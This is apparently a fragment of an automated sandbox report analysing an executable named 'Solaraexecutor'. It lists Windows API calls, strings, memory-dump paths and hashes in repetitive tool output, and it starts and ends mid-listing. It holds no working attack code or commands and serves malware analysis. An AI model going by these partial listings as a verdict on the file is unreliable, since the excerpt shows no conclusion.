                                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D3D720
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00D3D734
                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D3D75D
                                                      • DeleteObject.GDI32(00000000), ref: 00D3D764
                                                      • GetWindow.USER32(00000000,00000002), ref: 00D3D76D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                      • String ID: STATIC
                                                      • API String ID: 3820355801-1882779555
                                                      • Opcode ID: b9545baa43228e28cd12b9bdb95cba4d612dd8d3682107de652c73831aa9cf58
                                                      • Instruction ID: 2c6e8d289eb8427134bdd997c7ba895e446e2075b0e2052df58a88fd2e67c483
                                                      • Opcode Fuzzy Hash: b9545baa43228e28cd12b9bdb95cba4d612dd8d3682107de652c73831aa9cf58
                                                      • Instruction Fuzzy Hash: 911133B22007107BE220ABB4EC4AFAF765DEF00F02F044120FA46E21D1DA648F054BB2
                                                      APIs
                                                      • _free.LIBCMT ref: 00D49705
                                                        • Part of subcall function 00D48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?), ref: 00D48DE2
                                                        • Part of subcall function 00D48DCC: GetLastError.KERNEL32(?,?,00D4C896,?,00000000,?,00000000,?,00D4C8BD,?,00000007,?,?,00D4CCBA,?,?), ref: 00D48DF4
                                                      • _free.LIBCMT ref: 00D49711
                                                      • _free.LIBCMT ref: 00D4971C
                                                      • _free.LIBCMT ref: 00D49727
                                                      • _free.LIBCMT ref: 00D49732
                                                      • _free.LIBCMT ref: 00D4973D
                                                      • _free.LIBCMT ref: 00D49748
                                                      • _free.LIBCMT ref: 00D49753
                                                      • _free.LIBCMT ref: 00D4975E
                                                      • _free.LIBCMT ref: 00D4976C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 8864f281e5298fdb9165111b38c4faae473cd9b186d36c8d353693d9ddad2b2b
                                                      • Instruction ID: 9e8f7c2121774dae69ac7916f024d0bf658052f362a2fcc48dbec0a5722b7b20
                                                      • Opcode Fuzzy Hash: 8864f281e5298fdb9165111b38c4faae473cd9b186d36c8d353693d9ddad2b2b
                                                      • Instruction Fuzzy Hash: E311A476911109AFCB01EF95C842CDD3BB5EF14390B5154A1FA088F262DF32DA50AFA4
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 322700389-393685449
                                                      • Opcode ID: 44f43697a997d1515a675881d079e539aef7cd8a69a36eb5600aed5b81581c45
                                                      • Instruction ID: 06a7b4bd930d591e53affe15e30631780a5083d84c3b40ab0e7d47f49685b40f
                                                      • Opcode Fuzzy Hash: 44f43697a997d1515a675881d079e539aef7cd8a69a36eb5600aed5b81581c45
                                                      • Instruction Fuzzy Hash: 84B14671900209EFCF29DFA8C8819AEBBB5FF14310F58415AF8156B212D731EA55CBB1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D26FAA
                                                      • _wcslen.LIBCMT ref: 00D27013
                                                      • _wcslen.LIBCMT ref: 00D27084
                                                        • Part of subcall function 00D27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D27AAB
                                                        • Part of subcall function 00D27A9C: GetLastError.KERNEL32 ref: 00D27AF1
                                                        • Part of subcall function 00D27A9C: CloseHandle.KERNEL32(?), ref: 00D27B00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                      • API String ID: 3122303884-3508440684
                                                      • Opcode ID: 8a4ee2fc9f1ddd242aa8dcccd285d30790e6dd58af9810de212e8a81588e69b1
                                                      • Instruction ID: 6dc5e9d9d96bc9a9b728c60ecd72309945ddfe6fee6b8f844fcd81bde87da99a
                                                      • Opcode Fuzzy Hash: 8a4ee2fc9f1ddd242aa8dcccd285d30790e6dd58af9810de212e8a81588e69b1
                                                      • Instruction Fuzzy Hash: 4A4136B1D08364BAEF31E774AC42FEE776CDF28348F040455FA56A6182D670AA488731
                                                      APIs
                                                        • Part of subcall function 00D21316: GetDlgItem.USER32(00000000,00003021), ref: 00D2135A
                                                        • Part of subcall function 00D21316: SetWindowTextW.USER32(00000000,00D535F4), ref: 00D21370
                                                      • EndDialog.USER32(?,00000001), ref: 00D3B610
                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D3B637
                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D3B650
                                                      • SetWindowTextW.USER32(?,?), ref: 00D3B661
                                                      • GetDlgItem.USER32(?,00000065), ref: 00D3B66A
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D3B67E
                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D3B694
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                                      • String ID: LICENSEDLG
                                                      • API String ID: 3214253823-2177901306
                                                      • Opcode ID: 22afea95d4cbb3fb9542277e45877ae3466ef11d01dd5a8adc9d28031e6ad145
                                                      • Instruction ID: f97e42e284ce2e7f9ccbebfdb0a181338ba057588e7a782a929552536b3cbeb0
                                                      • Opcode Fuzzy Hash: 22afea95d4cbb3fb9542277e45877ae3466ef11d01dd5a8adc9d28031e6ad145
                                                      • Instruction Fuzzy Hash: 4421E532214304BBD2219F65EC4AF3B3B6DEB46F61F050015F748EA2E1DB529901D731
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,3A1A99F3,00000001,00000000,00000000,?,?,00D2AF6C,ROOT\CIMV2), ref: 00D3FD99
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00D2AF6C,ROOT\CIMV2), ref: 00D3FE14
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00D3FE1F
                                                      • _com_issue_error.COMSUPP ref: 00D3FE48
                                                      • _com_issue_error.COMSUPP ref: 00D3FE52
                                                      • GetLastError.KERNEL32(80070057,3A1A99F3,00000001,00000000,00000000,?,?,00D2AF6C,ROOT\CIMV2), ref: 00D3FE57
                                                      • _com_issue_error.COMSUPP ref: 00D3FE6A
                                                      • GetLastError.KERNEL32(00000000,?,?,00D2AF6C,ROOT\CIMV2), ref: 00D3FE80
                                                      • _com_issue_error.COMSUPP ref: 00D3FE93
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                      • String ID:
                                                      • API String ID: 1353541977-0
                                                      • Opcode ID: aca8028672310d8f02fb17ea2dfa1bb529394c785de54e987f1dd48ffde0066b
                                                      • Instruction ID: d293a8dcdf23712717715aec80590fd059a2cf7a9d1bf8f5695f9d76ffdcc52e
                                                      • Opcode Fuzzy Hash: aca8028672310d8f02fb17ea2dfa1bb529394c785de54e987f1dd48ffde0066b
                                                      • Instruction Fuzzy Hash: 4E41D571E0031DAFCB109F68DC45BAFBBA8EB48751F14423AF905E72A1DB3499008BB5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                      • API String ID: 3519838083-3505469590
                                                      • Opcode ID: 99b74f3360ee4c1c5a32ed4d802bb5351645ccc85f28ac1b3c7d2fcfe715d80b
                                                      • Instruction ID: d141eb74d3447b4a3642737f7b0f73c879ff546e630142ccbf48ca0961b47bb0
                                                      • Opcode Fuzzy Hash: 99b74f3360ee4c1c5a32ed4d802bb5351645ccc85f28ac1b3c7d2fcfe715d80b
                                                      • Instruction Fuzzy Hash: 21716A70A00729AFDB15DFA8D8959AEBBB8FF49755B040159F912E72A0CB30AD05CB70
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D29387
                                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D293AA
                                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D293C9
                                                        • Part of subcall function 00D2C29A: _wcslen.LIBCMT ref: 00D2C2A2
                                                        • Part of subcall function 00D31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00D2C116,00000000,.exe,?,?,00000800,?,?,?,00D38E3C), ref: 00D31FD1
                                                      • _swprintf.LIBCMT ref: 00D29465
                                                        • Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5
                                                      • MoveFileW.KERNEL32(?,?), ref: 00D294D4
                                                      • MoveFileW.KERNEL32(?,?), ref: 00D29514
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                      • String ID: rtmp%d
                                                      • API String ID: 3726343395-3303766350
                                                      • Opcode ID: e4a677e46a93a9a9fff2159250645a233ddb5866eaa22f765e086f719687aa48
                                                      • Instruction ID: 0a913e9454f0663aa7ebc3eafe72a189ccbd3f6801d6506e7275114b94321c29
                                                      • Opcode Fuzzy Hash: e4a677e46a93a9a9fff2159250645a233ddb5866eaa22f765e086f719687aa48
                                                      • Instruction Fuzzy Hash: 69419871900274A6CF21EFA0EC65EDEB37CEF65384F0448A5B649E3151DB388B898B74
                                                      APIs
                                                      • __aulldiv.LIBCMT ref: 00D3122E
                                                        • Part of subcall function 00D2B146: GetVersionExW.KERNEL32(?), ref: 00D2B16B
                                                      • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00D31251
                                                      • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00D31263
                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D31274
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D31284
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D31294
                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00D312CF
                                                      • __aullrem.LIBCMT ref: 00D31379
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                      • String ID:
                                                      • API String ID: 1247370737-0
                                                      • Opcode ID: 7b9a21b3a5a7e7bc5420bec7332b8b57200562ccb440ae78d9e8586991a3d3a3
                                                      • Instruction ID: 72c649efba07ead24f6345650629a91f58049e2b39b28606377032390020fd8c
                                                      • Opcode Fuzzy Hash: 7b9a21b3a5a7e7bc5420bec7332b8b57200562ccb440ae78d9e8586991a3d3a3
                                                      • Instruction Fuzzy Hash: 464106B5508306AFC710DF65C88496BBBF9FF88355F04892EF996C2210E734E659CB62
                                                      APIs
                                                      • _swprintf.LIBCMT ref: 00D22536
                                                        • Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5
                                                        • Part of subcall function 00D305DA: _wcslen.LIBCMT ref: 00D305E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: __vswprintf_c_l_swprintf_wcslen
                                                      • String ID: ;%u$x%u$xc%u
                                                      • API String ID: 3053425827-2277559157
                                                      • Opcode ID: 8c3325b207096f1c7aa7d7d03dcadcc280c41f12872d1699b98f7ada80abc5af
                                                      • Instruction ID: 65c71ea2f0a77f2dd6325615330f97037bd68f2f6e69a409b64062edfe1972b3
                                                      • Opcode Fuzzy Hash: 8c3325b207096f1c7aa7d7d03dcadcc280c41f12872d1699b98f7ada80abc5af
                                                      • Instruction Fuzzy Hash: B9F12871604360ABCB25EB28A495BBE7795AFB4308F08056DFCC69B283CB64C945C772
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: </p>$</style>$<br>$<style>$>
                                                      • API String ID: 176396367-3568243669
                                                      • Opcode ID: 73be03d4aa3775547ae2cdf8c2b48b2b9269b212f55a7bef68944cb07c557e9b
                                                      • Instruction ID: e99742f9b971ff436808466dfac3463efb627fc82099cbb1c2e5a9273523eb88
                                                      • Opcode Fuzzy Hash: 73be03d4aa3775547ae2cdf8c2b48b2b9269b212f55a7bef68944cb07c557e9b
                                                      • Instruction Fuzzy Hash: C651D66664632395DB30AA29AC32776F3E0DFA1751F6D042AFDC19B1C0FBE58D818271
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00D4FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00D4F6CF
                                                      • __fassign.LIBCMT ref: 00D4F74A
                                                      • __fassign.LIBCMT ref: 00D4F765
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00D4F78B
                                                      • WriteFile.KERNEL32(?,00000000,00000000,00D4FE02,00000000,?,?,?,?,?,?,?,?,?,00D4FE02,00000000), ref: 00D4F7AA
                                                      • WriteFile.KERNEL32(?,00000000,00000001,00D4FE02,00000000,?,?,?,?,?,?,?,?,?,00D4FE02,00000000), ref: 00D4F7E3
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: 3f030f2df00697338c6e562abf6251250a89a3a3f71d4ae0bd321c72f375728b
                                                      • Instruction ID: 6194cedc27cd640aba32c7fdf320935c95a7512fed71d463c643db511685d7b9
                                                      • Opcode Fuzzy Hash: 3f030f2df00697338c6e562abf6251250a89a3a3f71d4ae0bd321c72f375728b
                                                      • Instruction Fuzzy Hash: FD5153B1D003499FDB10CFA8DC85AEEBBF4EF09310F15416AE955E72A1D670AA41CBB0
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 00D42937
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00D4293F
                                                      • _ValidateLocalCookies.LIBCMT ref: 00D429C8
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00D429F3
                                                      • _ValidateLocalCookies.LIBCMT ref: 00D42A48
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: csm
                                                      • API String ID: 1170836740-1018135373
                                                      • Opcode ID: feb364b126849a136c2fa12234f0a4b9b6400ec57b0b0131f40aaf1e1b3b5860
                                                      • Instruction ID: 411db2a924b067ec2882da0bfe9545bd28ea38796b68cb599705a1c803e5f0ff
                                                      • Opcode Fuzzy Hash: feb364b126849a136c2fa12234f0a4b9b6400ec57b0b0131f40aaf1e1b3b5860
                                                      • Instruction Fuzzy Hash: 0B41AF30A00248AFCF10DF69C885AAEBBA5EF44324F588155FC15AB392D731DA05CFB0
                                                      APIs
                                                      • ShowWindow.USER32(?,00000000), ref: 00D39EEE
                                                      • GetWindowRect.USER32(?,00000000), ref: 00D39F44
                                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00D39FDB
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00D39FE3
                                                      • ShowWindow.USER32(00000000,00000005), ref: 00D39FF9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$RectText
                                                      • String ID: RarHtmlClassName
                                                      • API String ID: 3937224194-1658105358
                                                      • Opcode ID: 9997750b1c57fc16169ab585219f7807330cb623245f9feed5e85b35491393d6
                                                      • Instruction ID: 03427fa8a55fd8a9d616b359d64041cc6ee68e6f396e2352a040b84686900381
                                                      • Opcode Fuzzy Hash: 9997750b1c57fc16169ab585219f7807330cb623245f9feed5e85b35491393d6
                                                      • Instruction Fuzzy Hash: 7F419032104310AFDB219F68DC8CB6BBBA8FF48B11F044559F9499A256DB74D918CB71
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
